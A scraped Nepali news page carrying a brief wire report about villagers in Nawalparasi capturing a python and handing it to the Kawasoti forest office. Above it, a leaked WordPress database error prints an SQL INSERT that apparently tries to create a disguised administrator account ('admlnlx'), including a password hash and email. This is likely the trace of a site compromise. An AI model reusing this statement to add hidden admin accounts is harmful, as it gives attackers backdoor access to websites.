WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BjLU48VBggkZlDzX5XCS8oF2LsK5Ur0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 14:17:07', '', 'admlnlx', 'admlnlx')
कावासोती, मंसिर २३–
नवलपरासीको देउराली–६ डिही झ्यालवासमा अजिङ्गर फेला परेको छ । आज बिहान गाउँमा फेला परेको करिब ६ किलोग्रामको अजिङ्गरलाई महाभारत जैविक विविधता संरक्षण समाजको रोहवरमा सेक्टर वन कार्यालय, कावासोतीमा बुझाइएको छ ।
स्थानीय युवा धनबहादुर राना सहितको चारजनाको युवाको समूहले अजिङ्गरलाई नियन्त्रणमा लिएको थियो । जङ्गलमा छोड्दा चोरी–निकासी हुनसक्ने डरले युवाले वन कार्यालयमा उक्त अजिङ्गर बुझाएका हुन् । –रासस